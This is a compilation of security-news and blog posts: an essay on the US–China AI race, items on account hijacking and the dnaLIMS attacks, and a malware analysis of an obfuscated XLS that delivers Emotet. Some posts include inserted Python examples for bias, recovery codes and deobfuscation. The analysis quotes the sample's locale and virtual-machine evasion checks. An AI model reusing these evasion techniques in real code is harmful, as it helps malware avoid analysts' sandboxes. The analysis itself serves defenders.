According to foreign policy experts and the defense establishment, the United States is caught in an artificial intelligence arms race with China -- one with serious implications for national security. The conventional version of this story suggests that the United States is at a disadvantage because of self-imposed restraints on the collection of data and the privacy of its citizens, while China, an unrestrained surveillance state, is at an advantage. In this vision, the data that China collects will be fed into its systems, leading to more powerful AI with capabilities we can only imagine today. Since Western countries can't or won't reap such a comprehensive harvest of data from their citizens, China will win the AI arms race and dominate the next century.

This idea makes for a compelling narrative, especially for those trying to justify surveillance -- whether government- or corporate-run. But it ignores some fundamental realities about how AI works and how AI research is conducted.

Thanks to advances in machine learning, AI has flipped from theoretical to practical in recent years, and successes dominate public understanding of how it works. Machine learning systems can now diagnose pneumonia from X-rays, play the games of go and poker, and read human lips, all better than humans. They're increasingly watching surveillance video. They are at the core of self-driving car technology and are playing roles in both intelligence-gathering and military operations. These systems monitor our networks to detect intrusions and look for spam and malware in our email.

And it's true that there are differences in the way each country collects data. The United States pioneered "surveillance capitalism," to use the Harvard University professor Shoshana Zuboff's term, where data about the population is collected by hundreds of large and small companies for corporate advantage -- and mutually shared or sold for profit. The state picks up on that data, in cases such as the Centers for Disease Control and Prevention's use of Google search data to map epidemics and evidence shared by alleged criminals on Facebook, but it isn't the primary user.

China, on the other hand, is far more centralized. Internet companies collect the same sort of data, but it is shared with the government, combined with government-collected data, and used for social control. Every Chinese citizen has a national ID number that is demanded by most services and allows data to easily be tied together. In the western region of Xinjiang, ubiquitous surveillance is used to oppress the Uighur ethnic minority -- although at this point there is still a lot of human labor making it all work. Everyone expects that this is a test bed for the entire country.

Data is increasingly becoming a part of control for the Chinese government. While many of these plans are aspirational at the moment -- there isn't, as some have claimed, a single "social credit score," but instead future plans to link up a wide variety of systems -- data collection is universally pushed as essential to the future of Chinese AI. One executive at search firm Baidu predicted that the country's connected population will provide them with the raw data necessary to become the world's preeminent tech power. China's official goal is to become the world AI leader by 2030, aided in part by all of this massive data collection and correlation.

This all sounds impressive, but turning massive databases into AI capabilities doesn't match technological reality. Current machine learning techniques aren't all that sophisticated. All modern AI systems follow the same basic methods. Using lots of computing power, different machine learning models are tried, altered, and tried again. These systems use a large amount of data (the training set) and an evaluation function to distinguish between those models and variations that work well and those that work less well. After trying a lot of models and variations, the system picks the one that works best. This iterative improvement continues even after the system has been fielded and is in use.

So, for example, a deep learning system trying to do facial recognition will have multiple layers (hence the notion of "deep") trying to do different parts of the facial recognition task. One layer will try to find features in the raw data of a picture that will help find a face, such as changes in color that will indicate an edge. The next layer might try to combine these lower layers into features like shapes, looking for round shapes inside of ovals that indicate eyes on a face. The different layers will try different features and will be compared by the evaluation function until the one that is able to give the best results is found, in a process that is only slightly more refined than trial and error.

Large data sets are essential to making this work, but that doesn't mean that more data is automatically better or that the system with the most data is automatically the best system. Train a facial recognition algorithm on a set that contains only faces of white men, and the algorithm will have trouble with any other kind of face. Use an evaluation function that is based on historical decisions, and any past bias is learned by the algorithm. For example, mortgage loan algorithms trained on historic decisions of human loan officers have been found to implement redlining. Similarly, hiring algorithms trained on historical data manifest the same sexism as human staff often have. Scientists are constantly learning about how to train machine learning systems, and while throwing a large amount of data and computing power at the problem can work, more subtle techniques are often more successful. All data isn't created equal, and for effective machine learning, data has to be both relevant and diverse in the right ways.
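The claim above, that a larger but one-sided training set can lose to a smaller, more diverse one, is easy to reproduce in miniature. The following is an added example, not from the essay: a toy world with two subpopulations (A and B) that share one measured feature but differ in where the true decision boundary sits (the stand-in for "faces under different skin tones or lighting"; this asymmetry is an assumption of the toy, not data from anywhere). A 1-nearest-neighbour learner is trained once on many samples from A alone and once on fewer samples covering both groups, and both are scored on the same mixed test set.

```python
"""Added example: more one-sided data versus less diverse data, scored on a mixed test set."""
from typing import Dict, List, Tuple

Sample = Tuple[float, str, int]   # (feature value, subpopulation, true label)

BOUNDARY = {"A": 1.0, "B": 3.0}   # ground truth: label 1 above the group's own boundary


def true_label(x: float, group: str) -> int:
    return 1 if x > BOUNDARY[group] else 0


def make_samples(groups: List[str], steps: int) -> List[Sample]:
    """Feature values evenly spaced over [0, 4] for each group, labelled by ground truth."""
    return [(i * 4 / steps, g, true_label(i * 4 / steps, g))
            for g in groups for i in range(steps + 1)]


def predict(train: List[Sample], x: float, group: str) -> int:
    """1-NN over (feature, group). The group is just another input the model sees;
    with no training points from that group the learner falls back on the other one."""
    nearest = min(train, key=lambda s: (s[0] - x) ** 2 + (0.0 if s[1] == group else 100.0))
    return nearest[2]


def accuracy(train: List[Sample], test: List[Sample]) -> Tuple[int, int]:
    correct = sum(1 for x, g, y in test if predict(train, x, g) == y)
    return correct, len(test)


TEST = make_samples(["A", "B"], 40)      # 82 points, both groups, fine-grained
BIASED = make_samples(["A"], 40)         # 41 points, all from group A: "more data"
DIVERSE = make_samples(["A", "B"], 8)    # 18 points, both groups, coarser coverage


def compare() -> Dict[str, Tuple[int, int]]:
    return {"biased": accuracy(BIASED, TEST), "diverse": accuracy(DIVERSE, TEST)}


if __name__ == "__main__":
    for name, (ok, n) in compare().items():
        print(f"{name:8s} training set ({len(BIASED) if name == 'biased' else len(DIVERSE)} samples)"
              f" -> {ok}/{n} correct on the mixed test set")
```

The biased learner is perfect on group A and wrong on roughly half of group B, for 62 of 82 overall; the diverse learner, with fewer than half as many samples, misses only the four test points closest to the two boundaries, for 78 of 82. Nothing about the algorithm changed between the two runs; only the coverage of the training data did.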

Future research advances in machine learning are focused on two areas. The first is in enhancing how these systems distinguish between variations of an algorithm. As different versions of an algorithm are run over the training data, there needs to be some way of deciding which version is "better." These evaluation functions need to balance the recognition of an improvement with not over-fitting to the particular training data. Getting functions that can automatically and accurately distinguish between two algorithms based on minor differences in the outputs is an art form that no amount of data can improve.

The second is in the machine learning algorithms themselves. While much of machine learning depends on trying different variations of an algorithm on large amounts of data to see which is most successful, the initial formulation of the algorithm is still vitally important. The way the algorithms interact, the types of variations attempted, and the mechanisms used to test and redirect the algorithms are all areas of active research. (An overview of some of this work can be found here; even trying to limit the research to 20 papers oversimplifies the work being done in the field.) None of these problems can be solved by throwing more data at the problem.

The British AI company DeepMind's success in teaching a computer to play the Chinese board game go is illustrative. Its AlphaGo computer program became a grandmaster in two steps. First, it was fed some enormous number of human-played games. Then, the game played itself an enormous number of times, improving its own play along the way. In 2016, AlphaGo beat the grandmaster Lee Sedol four games to one.

While the training data in this case, the human-played games, was valuable, even more important was the machine learning algorithm used and the function that evaluated the relative merits of different game positions. Just one year later, DeepMind was back with a follow-on system: AlphaZero. This go-playing computer dispensed entirely with the human-played games and just learned by playing against itself over and over again. It plays like an alien. (It also became a grandmaster in chess and shogi.)

These are abstract games, so it makes sense that a more abstract training process works well. But even something as visceral as facial recognition needs more than just a huge database of identified faces in order to work successfully. It needs the ability to separate a face from the background in a two-dimensional photo or video and to recognize the same face in spite of changes in angle, lighting, or shadows. Just adding more data may help, but not nearly as much as added research into what to do with the data once we have it.

Meanwhile, foreign-policy and defense experts are talking about AI as if it were the next nuclear arms race, with the country that figures it out best or first becoming the dominant superpower for the next century. But that didn't happen with nuclear weapons, despite research only being conducted by governments and in secret. It certainly won't happen with AI, no matter how much data different nations or companies scoop up.

It is true that China is investing a lot of money into artificial intelligence research: The Chinese government believes this will allow it to leapfrog other countries (and companies in those countries) and become a major force in this new and transformative area of computing -- and it may be right. On the other hand, much of this seems to be a wasteful boondoggle. Slapping "AI" on pretty much anything is how to get funding. The Chinese Ministry of Education, for instance, promises to produce "50 world-class AI textbooks," with no explanation of what that means.

In the democratic world, the government is neither the leading researcher nor the leading consumer of AI technologies. AI research is much more decentralized and academic, and it is conducted primarily in the public eye. Research teams keep their training data and models proprietary but freely publish their machine learning algorithms. If you wanted to work on machine learning right now, you could download Microsoft's Cognitive Toolkit, Google's TensorFlow, or Facebook's PyTorch. These aren't toy systems; these are the state-of-the-art machine learning platforms.

AI is not analogous to the big science projects of the previous century that brought us the atom bomb and the moon landing. AI is a science that can be conducted by many different groups with a variety of different resources, making it closer to computer design than the space race or nuclear competition. It doesn't take a massive government-funded lab for AI research, nor the secrecy of the Manhattan Project. The research conducted in the open science literature will trump research done in secret because of the benefits of collaboration and the free exchange of ideas.

While the United States should certainly increase funding for AI research, it should continue to treat it as an open scientific endeavor. Surveillance is not justified by the needs of machine learning, and real progress in AI doesn't need it.

This essay was written with Jim Waldo, and previously appeared in Foreign Policy.

Twitter Shuts Down 5000 State-Sponsored Accounts

Twitter has taken down nearly 5000 fake accounts, most of them apparently backed by the Iranian state, in a bid to clean the platform of government-sponsored attempts to spread propaganda.

The social network claimed in a post last week that it had closed 4779 accounts linked to Tehran, 1666 of which tweeted nearly two million times, with content “that benefited the diplomatic and geostrategic views of the Iranian state.”

Another subset of 248 accounts was engaged in discussions related to Israel, while 2865 “employed a range of false personas to target conversations about political and social issues in Iran and globally.”

Four accounts were linked to the infamous Internet Research Agency (IRA), the Kremlin-linked organization responsible for a mass disinformation campaign on social media ahead of the 2016 US Presidential election.

Also removed by Twitter during this cull were 130 fake accounts linked to organizations including Esquerra Republicana de Catalunya, which spread content designed to “inorganically influence the conversation” about Catalan independence.

Twitter closed down a further 33 accounts run by a “commercial entity” operating in Venezuela “that were engaging in platform manipulation targeted outside of the country.”

“Our Site Integrity team is dedicated to identifying and investigating suspected platform manipulation on Twitter, including potential state-backed activity. In partnership with teams across the company, we employ a range of open-source and proprietary signals and tools to identify when attempted coordinated manipulation may be taking place, as well as the actors responsible for it,” wrote Twitter head of site integrity, Yoel Roth.

“We also partner closely with governments, law enforcement, and our peer companies to improve our understanding of the actors involved in information operations and develop a holistic strategy for addressing them.”

Instagram Tests Changes to Help Users Recover Hacked Accounts

Following numerous complaints, Instagram has started testing new ways for users to recover hacked accounts.

Hackers have been targeting many high-profile Instagram accounts, such as those of lifestyle and fitness influencers, and a wave of complaints has followed. The attackers gain access through phishing emails that purport to come from brands wanting to sponsor the target. Once inside, they change the password and demand a payment in Bitcoin to return the account. Users flooded Instagram with complaints, accused the company of failing to provide proper customer support, and were frustrated enough with its cumbersome account recovery process to turn to outside experts for help.

Now Instagram has announced that it is testing changes that could make it easier for users to recover hacked accounts, together with security features that would make it harder for cybercriminals to steal Instagram usernames. It is a two-pronged approach: measures to prevent Instagram account hijacking and measures to help users recover accounts that have already been hacked.

Instagram began testing the first change on Monday, June 17, 2019. Users who cannot sign in because Instagram reports their password as incorrect (typically because a hacker has changed it) can click the ‘Need more help’ option on the login page and have a six-digit code sent to their email address or phone number. That code lets them regain access to the account.

Hackers, however, sometimes also control the victim’s email account or phone number. To address this, Instagram says the codes sent to a user’s email address or phone number cannot be used to access the account from a different device. The process being tested would also let a victim recover an account even if the hacker has changed its username, which matters because hackers have been targeting users with sought-after handles such as first names and single words. Instagram is also reportedly testing a hold that keeps a username reserved for a period of time after any account change, so that nobody else can claim it even if the original owner loses access to the account after a hack. This feature, currently available on Android, will now be available to iOS users as well.
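Instagram has not published how the device binding works, so the following is an added example of one way to build the property the paragraph describes (a short-lived, single-use recovery code that is only honoured from the device it was issued to), not Instagram’s code. The code lifetime, the guess limit and the shape of the device identifier are assumptions for the example; the point is that the device is mixed into the server-side MAC of the code, so the same six digits typed on another device simply do not verify.

```python
"""Added example: device-bound, single-use, expiring recovery codes."""
import hashlib
import hmac
import secrets
import time
from typing import Callable, Dict

CODE_TTL_SECONDS = 10 * 60   # assumed lifetime of a recovery code
MAX_ATTEMPTS = 5             # assumed guess cap; a 6-digit code has only 10**6 values


class RecoveryCodes:
    """Issues a 6-digit code for (account, device) and redeems it only from that device."""

    def __init__(self, server_key: bytes, clock: Callable[[], float] = time.time):
        self._key = server_key                # server-side secret, never sent to the client
        self._clock = clock                   # injectable so expiry can be tested
        self._pending: Dict[str, dict] = {}   # account -> one outstanding code

    def _digest(self, account: str, device_id: str, code: str) -> bytes:
        # Binding the device into the MAC is what makes the code useless elsewhere.
        msg = f"{account}\x00{device_id}\x00{code}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).digest()

    def issue(self, account: str, device_id: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[account] = {            # replaces any older code for the account
            "digest": self._digest(account, device_id, code),
            "expires": self._clock() + CODE_TTL_SECONDS,
            "attempts": 0,
        }
        return code   # delivered out of band (email/SMS); only its MAC is stored

    def redeem(self, account: str, device_id: str, code: str) -> bool:
        rec = self._pending.get(account)
        if rec is None:
            return False
        if self._clock() > rec["expires"]:
            del self._pending[account]
            return False
        rec["attempts"] += 1
        if rec["attempts"] > MAX_ATTEMPTS:
            del self._pending[account]        # too many guesses: a fresh code is required
            return False
        ok = hmac.compare_digest(rec["digest"], self._digest(account, device_id, code))
        if ok:
            del self._pending[account]        # single use
        return ok


def demo() -> Dict[str, bool]:
    """The cases that matter: wrong device, right device, reuse, expiry."""
    now = [1_000_000.0]
    store = RecoveryCodes(server_key=secrets.token_bytes(32), clock=lambda: now[0])
    code = store.issue("alice", "phone-A")
    results = {
        "other_device_rejected": not store.redeem("alice", "phone-B", code),
        "same_device_accepted": store.redeem("alice", "phone-A", code),
        "second_use_rejected": not store.redeem("alice", "phone-A", code),
    }
    code = store.issue("alice", "phone-A")
    now[0] += CODE_TTL_SECONDS + 1
    results["expired_rejected"] = not store.redeem("alice", "phone-A", code)
    return results


if __name__ == "__main__":
    for case, passed in demo().items():
        print(f"{case}: {'ok' if passed else 'FAIL'}")
```

The guess cap is not decoration: a six-digit code with no attempt limit falls to online brute force in minutes, and a device identifier that the client can simply assert (rather than one tied to an existing session or push token) would let the attacker claim to be the victim’s phone, so in a real deployment the identifier must come from something the server already trusts.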

Experts are of the opinion that the new changes that are being tested would have a great impact on Instagram account takeovers by cybercriminals and would be of great help to users. Instances of hackers trying to claim usernames for accounts that are hacked and instances of hackers using other devices to access targeted accounts would definitely go down, say the experts.

The post Instagram Tests Changes to Help Users Recover Hacked Accounts appeared first on .

Web-based DNA sequencers getting compromised through old, unpatched flaw

Unknown attackers are trying to exploit a vulnerability in dnaLIMS, a Web based bioinformatics laboratory information management system, to implant a bind shell into the underlying web server. Researcher Ankit Anubhav first noticed the attacks on June 12 and they are apparently still going on. About dnaLIMS DnaLIMS is developed by Colorado-based dnaTools. It provides software tools for processing and managing DNA sequencing requests. These tools use browsers to access a UNIX-based web server on … More

The post Web-based DNA sequencers getting compromised through old, unpatched flaw appeared first on Help Net Security.

Europol Gamifies Cryptocurrency Crime Prevention

Europol trained its members on cryptocurrency-related crime at a conference last week, announcing the development of a new game.

The cross-jurisdictional law enforcement organization said that over 300 cryptocurrency experts, from both the police and the private sector, attended its headquarters in The Hague last week for the region’s largest conference of its kind.

The aim was to share best practice and look at new partnership-building opportunities to combat the growth in cybercrime linked to digital currencies, as well as techniques for recovering virtual assets stolen by hackers.

At the show, Europol announced the development of a new “cryptocurrency tracing game” developed in partnership with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organised Crime Research).

Set to launch in October, the unnamed title will be the first “law enforcement training opportunity” to use gamification techniques to train officers on cryptocurrency and investigation.

“It will allow law enforcement officers to get hands-on training and advice on tracing cryptocurrencies in criminal investigations,” according to Europol.

The news comes as the popularity of illicit cryptocurrency mining appears to be waning among the cybercrime community – at least in terms of attacks on consumers.

Consumer detections of cryptojacking dropped to almost zero in Q1, thanks in part to the decision by Coinhive to shut down its operations, although attacks against businesses continue to rise, especially in APAC, Malwarebytes said last month.

Meanwhile, attacks on cryptocurrency firms continue unabated. Just last week, hackers made off with nearly $9.7m in virtual coins after a successful attack on digital wallet provider GateHub.

Among the experts at the Europol conference were representatives from: Binance, BitBay, Bitfinex, BitFlyer Europe, Bitnovo, Bitonic, Bitpanda, BitPay, Bitstamp, CEX, Coinbase, Coinfloor, Coinhouse, Coinpayments, CoinsPaid, Ledger, Litebit, LocalBitcoins, OKCoin, Shapeshift, SpectroCoin, Tether and Xapo.

They shared best practices on implementing Know Your Customer (KYC) policies and risk-based approaches to suspicious transactions, according to Europol.

[Results] CLB Super Holder Event

Greetings Cloudbric community!

Thank you for your interest in our CLB Super Holder event which has now come to an end.

On June 17 at exactly 4pm KST, the price of CLB stood at 10.4 KRW (approx. $0.0088 USD).

As mentioned, all eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

Please check the airdrop list and look to see if your email was accepted in alignment with the guidelines.

Airdrop list

Please note that users that had already transferred CLB tokens prior to June 11th, 2019 at 2pm KST will receive an additional 200 CLB bonus airdrop to help mitigate any issues or confusion regarding wallet addresses and transfers.

The winners of the CLB Super Holder event will be issued their CLB tokens by June 24 and will receive their CLBK tokens after Klaytn’s main net launch. More details soon to come.

Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Results] CLB Super Holder Event appeared first on Cloudbric.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated malware sample that made me think about the meaning of ‘targeted attack’.

Nowadays ‘targeted attack’ is mostly used to describe attacks on state assets or business sectors. For example, a targeted attack might address the naval industry (MartyMcFly is definitely a great example) or US companies (Botnet Against USA, Canada and Italy is another great example); such campaigns are built around specific target sectors. When I looked into the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from ‘what to target’ to ‘what to untarget’. In other words, it looks like the attacker doesn’t have a clear vision of his desired victims but, on the contrary, has very clear intentions about which victims must be avoided. But let’s start from the beginning.

Looking through the public samples submitted to Yomi (Yoroi’s public sandbox), the following one caught my eye (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a)

Public Submitted Sample on Yomi

The file looks like a common XLS file with a low antivirus detection rate, as shown in the following image (6/63).

Antivirus Detection Rate

Taking a closer look at the Office file, it is easy to spot an “Auto Open” procedure in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple breakpoint and a message box to externalize the real payload are enough to expose the second stage, which happens to be written in PowerShell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to work out how to move from the obfuscated version to the plain-text, readable format shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least from my personal point of view). As you can see in the deobfuscated Stage2 code (previous image), two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated JavaScript stage, let’s call it Stage3_b. We’ll take care of those stages later; for now let’s focus on the initial conditional branch, which discriminates the real behaviour from the fake one, in other words decides whether the real payload runs at all.

The second side of the branch is ordinary: -match "VirtualBox|VMware|KVM" tries to avoid execution on virtual machines (and therefore detection and analysis). The first side is the interesting one: (Get-UICulture).Name -match "RO|CN|UA|BY|RU" reads the victim machine’s locale and attacks everybody except Romania, China, Ukraine, Belarus and Russia (PowerShell’s -match is a case-insensitive regular-expression match, so culture names such as ro-RO, zh-CN or ru-RU all satisfy it). So we are facing the one’s complement of a targeted attack. I’d like to call it an “untargeted” attack, which is not the same as an opportunistic attack. Many questions come to mind: why not attack those countries? Does the attacker fear them, or does the attacker belong to that area? We’ll probably never get answers, but we can appreciate this intriguing attack behaviour. (BTW, I’m aware this is not the first sample with this characteristic, but I do know it is an increasing trend.) One practical consequence for analysts: a sandbox whose UI culture matches one of those codes, or whose hardware strings reveal VirtualBox, VMware or KVM, will only ever see the benign branch. But let’s move on with the analysis.


Stage3_a, the downloaded Windows PE, is clearly the final infection stage. Many antivirus engines classify it as Emotet, so I won’t invest time in this well-known malware.


Stage3_b, by contrast, is a large and obfuscated piece of JavaScript. The obfuscation relies on three main techniques:

  • Encoded strings. The strings are encoded in different ways, from “to integer” to hexadecimal.
  • String concatenation and dynamic evaluation. eval is used to dynamically extract values that are in turn used to decode more strings.
  • String substitutions. Through find-and-replace functions, and loops that extract sub-strings, the attacker hides the clear text inside character-set noise.

After some “hand work”, a deobfuscated Stage3_b finally came out. The following image shows the obfuscated and deobfuscated versions side by side. We are still facing one more obfuscated stage, let’s call it Stage4_b, which happens to be, again, an obfuscated PowerShell script… how about that!?
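The “to integer” and hexadecimal encodings mentioned for this stage, and the integer conversion plus concatenation used in Stage1 and Stage2, can be undone statically without ever evaluating the script. The helpers below are an added example of that kind of pass, not the author’s tooling and not taken from the analysed sample: they collapse VBA Chr()/PowerShell [char] runs, JavaScript String.fromCharCode() calls and \xHH escapes into literals, then fold adjacent literals joined by & or +, and repeat until nothing changes. The inputs in demo() are constructed for the example.

```python
"""Added example: static passes that decode integer/hex string encodings into literals."""
import re

# VBA Chr(104) / ChrW(104) / Chr$(104) and PowerShell [char]104, joined by & or +.
_ONE_CHAR = re.compile(r"Chr[W$]?\s*\(\s*(\d+)\s*\)|\[char\]\s*(\d+)", re.IGNORECASE)
_CHAR_RUN = re.compile(
    r"(?:(?:Chr[W$]?\s*\(\s*\d+\s*\)|\[char\]\s*\d+)"
    r"(?:\s*[&+]\s*(?=Chr[W$]?\s*\(|\[char\]))?)+",   # only swallow a joiner followed by another call
    re.IGNORECASE,
)
# JavaScript String.fromCharCode(104,116,...) and \xHH escapes.
_FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)")
_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# "abc" & "def"  /  "abc" + "def"  ->  "abcdef"
_LITERAL_JOIN = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')


def _quote(chars: str) -> str:
    return '"' + chars + '"'


def decode_char_runs(text: str) -> str:
    """Replace every run of Chr()/[char] calls with the literal it builds."""
    def repl(m):
        codes = [int(a or b) for a, b in _ONE_CHAR.findall(m.group(0))]
        return _quote("".join(chr(c) for c in codes))
    return _CHAR_RUN.sub(repl, text)


def decode_from_char_code(text: str) -> str:
    def repl(m):
        codes = [int(n) for n in m.group(1).replace(",", " ").split()]
        return _quote("".join(chr(c) for c in codes))
    return _FROM_CHAR_CODE.sub(repl, text)


def decode_hex_escapes(text: str) -> str:
    # Decoded for reading only: a decoded quote or backslash is not re-escaped.
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def join_literals(text: str) -> str:
    return _LITERAL_JOIN.sub(lambda m: _quote(m.group(1) + m.group(2)), text)


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Run the passes to a fixed point; one pass often exposes material for the next."""
    for _ in range(max_rounds):
        new = join_literals(decode_hex_escapes(decode_from_char_code(decode_char_runs(text))))
        if new == text:
            break
        text = new
    return text


# Constructed inputs in the three syntaxes the stages use.
SAMPLES = {
    "vba": 'x = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://" & Chr(101)',
    "powershell": '$u=[char]104+[char]116+[char]116+[char]112;$v=$u+"s"',
    "javascript": 'var c = String.fromCharCode(104,116,116,112) + "\\x3a\\x2f\\x2f";',
}


def demo() -> dict:
    return {name: deobfuscate(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name:11s} {out}")
```

This deliberately stops short of the eval-driven layer: values produced at run time by function-array enumeration or substitution loops need either an emulator or the breakpoint-and-message-box trick used above, and the static passes here are only meant to shrink that work.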

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)

Stage4_b uses the same obfuscation techniques seen in Stage2, so the same deobfuscation technique applies. But wait a minute… we already know this code: it is the deobfuscated Stage2! So we have two command-and-control servers serving the final launching script and gaining persistence on the victim.

Deobfuscated Stage4_b


Even if the sample is interesting per se, given its low AV detection rate, that is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to targeted attacks, meaning attacks on specific industries, sectors or states, and to opportunistic attacks, meaning attacks spread all over the world with no specific target. Today we might introduce one more attack type, the untargeted attack: attacking everybody except specific assets, industries or states (as in the case analysed here).

Further technical details, including IoCs and Yara rules, are reported in the original post published on Marco Ramilli’s blog:

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research on malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration tests on several US electronic voting systems. I have also been in charge of testing the uVote voting system for the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the intelligence ecosystem. I decided to broaden my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing that Defence Belongs To Humans.

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)

The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

Hacker is targeting DNA sequencer applications from Iranian IP address

Threat actors are targeting Web-based DNA sequencer applications leveraging a still-unpatched zero-day to take over the targeted systems.

Starting from June 12, 2019, the researcher Ankit Anubhav from NewSky Security, observed threat actors targeting Web-based DNA sequencer applications. The attackers are leveraging a still-unpatched zero-day vulnerability, tracked as CVE-2017-6526, to gain full control over the targeted systems.

The vulnerability in dnaLIMS was reported to the vendor in 2017, but it is still unpatched.

The attackers are scanning the Internet for dnaLIMS, a web-based application used to handle DNA sequencing operations; these systems are used in the research industry. The attacks originated from an IP address located in Iran.

“From June 12 – 14, we saw regular attacks from , an IP located in Iran, utilizing CVE-2017-6526, an issue in dnaTools dnaLIMS 4-2015s13. According to, dnaLIMS™ is a Web based bioinformatics LIMS that provides scientists and researchers with hardware independent software tools for processing and managing DNA sequencing requests.” reads a blog post published by the expert.

The hackers leverage the vulnerability to bind a shell and take control of the web server.

Why DNA sequencing apps?

Attackers could be interested in stealing hashes of DNA sequences from the application’s database to resell them on the dark web or compromising servers to add to their botnet.

We cannot exclude that the threat actor behind these attacks is using exploits available online at random, in an attempt to compromise a large number of systems.

It is still unclear why attackers are targeting DNA sequencing apps: the number of these devices is limited (only a few tens of devices are exposed online) and it is unlikely that hackers want to use the compromised systems to carry out DDoS attacks.

“The exact motives of the attacker(s) is unknown. Unlike an IPCamera or Router based IoT device, these are very unique devices installed in scientific, academic and medical institutions. As a result, the number of such devices is not very high and might not help greatly in DDoS.” concludes the expert.

“However, successful exploitation and DNA theft in specific cases can be fruitful. Either it can be sold in black market, or a high profile attacker can actually be looking for a specific persons’ data.

We are not aware of a patch for this bug. In fact, when we had a look at the original disclosure by ShoreBreakSecurity, we saw a funny disclosure response by the vendor, indicating they don’t take DNA theft seriously.”

The expert also analyzed historical activity related to the attacker’s IP address and discovered that it was also associated with nmap scans and with the use of two other exploits, for Zyxel routers (CVE-2017-6884) and for the Apache Struts flaw (CVE-2017-5638).

Pierluigi Paganini

(SecurityAffairs – DNA sequencer applications, hacking)

The post Hacker is targeting DNA sequencer applications from Iranian IP address appeared first on Security Affairs.

What does runtime container security really mean?

End-to-end protection for containers in production is required to avoid the steep operational and reputational costs of data breaches. As news of container attacks and fresh vulnerabilities continues to prove, short cuts (or incomplete security strategies) aren’t going to work. Runtime container security means vetting all activities within the container application environment, from analysis of container and host activity to monitoring the protocols and payloads of network connections. Containers running in production environments actively fulfill … More

The post What does runtime container security really mean? appeared first on Help Net Security.

Are U.S. companies overpaying to attract new talent?

While compensation remains a top driver to attract and retain talent in the U.S., employees only expect about a 10% salary increase to switch employers, while companies are offering average compensation increases around 15%, according to a recent survey by Gartner. While many U.S. employers continue to extend lucrative compensation offers to persuade workers to switch companies, the premiums to attract talent might not be as high as employers think. “Not only are U.S. employers … More

The post Are U.S. companies overpaying to attract new talent? appeared first on Help Net Security.

Appliance upgrades and excessive network latency delaying Office 365 deployments

Gateway appliance upgrades and excessive network latency continue to delay Office 365 deployments, according to Zscaler. Network congestion The survey showed that 41 percent of enterprises found network congestion as a major factor impacting the user experience. To address network issues, almost half of the enterprises surveyed are exploring the use of direct internet connections, which can reduce congestion and eliminate the latency caused by backhauling traffic. “Modern cloud applications require modern cloud architectures. Many … More

The post Appliance upgrades and excessive network latency delaying Office 365 deployments appeared first on Help Net Security.

New EU-funded project aims to disrupt wildlife cybercrime

A new European Union (EU)-funded project aims to disrupt criminals trafficking wildlife in or via the EU using the internet, postal or fast parcel services. The project is implemented by a strong coalition gathering WWF, IFAW, INTERPOL, the Belgian Customs and TRAFFIC. The project is led by WWF Belgium, in affiliation with TRAFFIC. Funded by the Internal Security Fund of the Directorate General for Migration and Home Affairs of the European Commission, the two-year “Disrupting … More

The post New EU-funded project aims to disrupt wildlife cybercrime appeared first on Help Net Security.

Human error still the cause of many data breaches

With the incidence of reported data breaches on the rise, more than half of all C-suite executives (C-Suites) (53%) and nearly three in 10 Small Business Owners (SBOs) (28%) who suffered a breach reveal that human error or accidental loss by an external vendor/source was the cause of the data breach, according to a Shred-it survey conducted by Ipsos. When assessing additional causes of data breaches, the report found that nearly half of all C-Suites … More

The post Human error still the cause of many data breaches appeared first on Help Net Security.

Worldwide IoT spending forecast to reach $726 billion this year

Worldwide spending on the Internet of Things (IoT) is forecast to pass the $1.0 trillion mark in 2022, reaching $1.1 trillion in 2023. CAGR for IoT spending A new update to the International Data Corporation (IDC) Worldwide Semiannual Internet of Things Spending Guide shows the compound annual growth rate (CAGR) for IoT spending over the 2019-2023 forecast period will be 12.6%. “Spending on IoT deployments continues with good momentum and is expected to be $726 … More

The post Worldwide IoT spending forecast to reach $726 billion this year appeared first on Help Net Security.

How to Book Your Next Holiday Online and NOT Get Scammed

Taking our tribe on an annual family holiday has always been a top priority for my husband and me. But with 4 sons, who all eat ridiculous amounts, this can be an expensive exercise. So, like most people, I am always on the lookout for deals and ways to save money on trips to our favourite holiday destinations.

